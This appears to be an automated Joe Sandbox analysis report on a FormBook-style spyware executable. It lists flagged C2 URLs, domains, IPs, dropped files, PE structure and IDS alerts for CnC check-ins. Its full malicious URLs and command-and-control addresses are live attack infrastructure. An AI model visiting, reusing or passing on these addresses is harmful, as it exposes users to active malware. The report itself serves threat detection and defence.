| http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== | 100% | Avira URL Cloud | malware | |
| http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&amp;rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/../images/bg-landing-page.jpg | 0% | Avira URL Cloud | safe | |
| http://www.e8af.xyz/hhdc/ | 100% | Avira URL Cloud | malware | |
| http://www.smalleyes.icu/s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn | 0% | Avira URL Cloud | safe | |
| http://www.pbfgm.xyz/fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== | 0% | Avira URL Cloud | safe | |
| https://www.hosttech.ch | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/y54z/ | 100% | Avira URL Cloud | malware | |
| http://www.mohawktooldie.online/e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/images/favicons/safari-pinned-tab.svg | 0% | Avira URL Cloud | safe | |
| http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/images/favicons/apple-touch-icon.png | 0% | Avira URL Cloud | safe | |
| http://www.primespot.live/b8eq/ | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/images/favicons/favicon-16x16.png | 0% | Avira URL Cloud | safe | |
| http://www.smalleyes.icu/s6zh/ | 0% | Avira URL Cloud | safe | |
| https://00808.vip/ | 0% | Avira URL Cloud | safe | |
| http://www.mohawktooldie.online/e1ut/ | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/js/app.js | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.mohawktooldie.online | 208.91.197.27 | true | true | | unknown |
| www.smalleyes.icu | 134.122.191.187 | true | true | | unknown |
| www.ausyva4.top | 104.21.48.233 | true | true | | unknown |
| www.pbfgm.xyz | 104.21.86.111 | true | true | | unknown |
| www.elinor.club | 194.58.112.174 | true | false | | high |
| www.e8af.xyz | 3.252.97.86 | true | true | | unknown |
| www.primespot.live | 209.74.79.42 | true | true | | unknown |
| www.btblxhh.top | 156.234.28.101 | true | true | | unknown |
| www.graviton.energy | 185.101.158.113 | true | true | | unknown |
| www.phdcoach.pro | unknown | unknown | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.ausyva4.top/p9tq/ | true | Avira URL Cloud: malware | unknown |
| http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn | true | Avira URL Cloud: malware | unknown |
| http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn | true | Avira URL Cloud: malware | unknown |
| http://www.elinor.club/1ne4/ | true | Avira URL Cloud: malware | unknown |
| http://www.btblxhh.top/dp9c/ | true | Avira URL Cloud: safe | unknown |
| http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== | true | Avira URL Cloud: malware | unknown |
| http://www.e8af.xyz/hhdc/ | true | Avira URL Cloud: malware | unknown |
| http://www.smalleyes.icu/s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn | true | Avira URL Cloud: safe | unknown |
| http://www.mohawktooldie.online/e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== | true | Avira URL Cloud: safe | unknown |
| http://www.pbfgm.xyz/fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== | true | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/y54z/ | true | Avira URL Cloud: malware | unknown |
| http://www.primespot.live/b8eq/ | true | Avira URL Cloud: malware | unknown |
| http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn | true | Avira URL Cloud: malware | unknown |
| http://www.smalleyes.icu/s6zh/ | true | Avira URL Cloud: safe | unknown |
| http://www.mohawktooldie.online/e1ut/ | true | Avira URL Cloud: safe | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF | finger.exe, 0000000B.00000002.3141353957.0000000004078000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000003B18000.00000004.00000001.00040000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://duckduckgo.com/chrome_newtab | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.graviton.energy/images/favicons/manifest.json | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://dts.gnpge.com | RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://duckduckgo.com/ac/?q= | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://www.networksolutions.com/ | finger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.graviton.energy/images/favicons/browserconfig.xml | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd | finger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/images/favicons/favicon-32x32.png | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/images/logo-hosttech.svg | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/css/app.css | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/images/favicons/favicon.ico | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.e8af.xyz | RAdsmABlJtKpzt.exe, 0000000C.00000002.3140404421.0000000002EB4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&amp;rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m | finger.exe, 0000000B.00000002.3141353957.00000000049E4000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004484000.00000004.00000001.00040000.00000000.sdmp | true | Avira URL Cloud: malware | unknown |
| https://www.ecosia.org/newtab/ | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.graviton.energy/../images/bg-landing-page.jpg | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf | finger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.graviton.energy/images/favicons/safari-pinned-tab.svg | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ac.ecosia.org/autocomplete?q= | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://use.typekit.net/bag0psx.css | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://www.hosttech.ch | RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.graviton.energy/images/favicons/favicon-16x16.png | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/images/favicons/apple-touch-icon.png | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://00808.vip/ | finger.exe, 0000000B.00000002.3141353957.000000000439C000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000003E3C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.graviton.energy/js/app.js | finger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.79.42 | www.primespot.live | United States | 31744 | MULTIBAND-NEWHOPEUS | true
134.122.191.187 | www.smalleyes.icu | United States | 64050 | BCPL-SGBGPNETGlobalASNSG | true
3.252.97.86 | www.e8af.xyz | United States | 16509 | AMAZON-02US | true
104.21.48.233 | www.ausyva4.top | United States | 13335 | CLOUDFLARENETUS | true
156.234.28.101 | www.btblxhh.top | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
208.91.197.27 | www.mohawktooldie.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
104.21.86.111 | www.pbfgm.xyz | United States | 13335 | CLOUDFLARENETUS | true
185.101.158.113 | www.graviton.energy | Switzerland | 207143 | HOSTTECH-ASCH | true
194.58.112.174 | www.elinor.club | Russian Federation | 197695 | AS-REGRU | false
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588797
                                                            Start date and time:2025-01-11 05:41:27 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 10s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
                                                            Number of analysed new started processes analysed:16
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:wSoShbuXnJ.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@10/9
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 83
                                                            • Number of non-executed functions: 282
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 4.175.87.197, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            No simulations
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\finger.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.729588487053115
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:wSoShbuXnJ.exe
                                                            File size:834'560 bytes
                                                            MD5:feea3eb7d321ac0ff06d81683ac140ed
                                                            SHA1:9a18261e4703b51dec32610dd0c822de8ba2d752
                                                            SHA256:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5
                                                            SHA512:61da59961d4acafdd1b5de376dc35485966fb25bc13c6fa43f161b5a775d4c8161b3d933da2f05405a9b0af49398ccd8ebcf38bbe119c9d5082358ea890b75e0
                                                            SSDEEP:12288:GhXR9b4YbiwyFhGltSNXn5Foh1L2D6bNzPRrSRKrsmmPEojzOIYfn4:GhX/WOSp5Oh1UuNDcSUEm7q
                                                            TLSH:8E0502741A49C902C86D6B740972F2BE1BB88FDBF402E71B5FCA6DFB7D11A4648644C2
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.kg..............0.................. ........@.. ....................... ............@................................
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x4cd006
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x676B9433 [Wed Dec 25 05:12:19 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            push ebx
                                                            add byte ptr [ecx+00h], bh
                                                            jnc 00007F73807ECEE2h
                                                            je 00007F73807ECEE2h
                                                            add byte ptr [ebp+00h], ch
                                                            add byte ptr [edx+00h], dl
                                                            add byte ptr [esi+00h], ah
                                                            insb
                                                            add byte ptr [ebp+00h], ah
                                                            arpl word ptr [eax], ax
                                                            je 00007F73807ECEE2h
                                                            imul eax, dword ptr [eax], 006E006Fh
                                                            add byte ptr [ecx+00h], al
                                                            jnc 00007F73807ECEE2h
                                                            jnc 00007F73807ECEE2h
                                                            add byte ptr [ebp+00h], ch
                                                            bound eax, dword ptr [eax]
                                                            insb
                                                            add byte ptr [ecx+00h], bh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            dec esp
                                                            add byte ptr [edi+00h], ch
                                                            popad
                                                            add byte ptr [eax+eax+00h], ah
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xccfb4 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xce000 | 0x51c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x2000 | 0xcb04c | 0xcb200 | 03b91143da00255a61cb598997b1f7fa | False | 0.8937704326923077 | data | 7.737457250389855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xce000 | 0x51c | 0x600 | a5c0005ae57a3ddddc848c276b1e0707 | False | 0.3580729166666667 | data | 2.929288226801208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd0000 | 0xc | 0x200 | 801d563e39ec8efa5545ec53e57d0fe0 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
RT_VERSION | 0xce058 | 0x4c0 | data | | | 0.42269736842105265
DLL | Import
--- | ---
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2025-01-11T05:43:26.279884+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49980 | 104.21.86.111 | 80 | TCP
2025-01-11T05:43:26.279884+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49980 | 104.21.86.111 | 80 | TCP
2025-01-11T05:43:50.308035+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49982 | 194.58.112.174 | 80 | TCP
2025-01-11T05:43:52.866259+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49983 | 194.58.112.174 | 80 | TCP
2025-01-11T05:43:55.424624+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49984 | 194.58.112.174 | 80 | TCP
2025-01-11T05:43:57.983996+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49985 | 194.58.112.174 | 80 | TCP
2025-01-11T05:43:57.983996+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49985 | 194.58.112.174 | 80 | TCP
2025-01-11T05:44:04.341308+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49986 | 134.122.191.187 | 80 | TCP
2025-01-11T05:44:06.880750+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49987 | 134.122.191.187 | 80 | TCP
2025-01-11T05:44:09.419966+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49988 | 134.122.191.187 | 80 | TCP
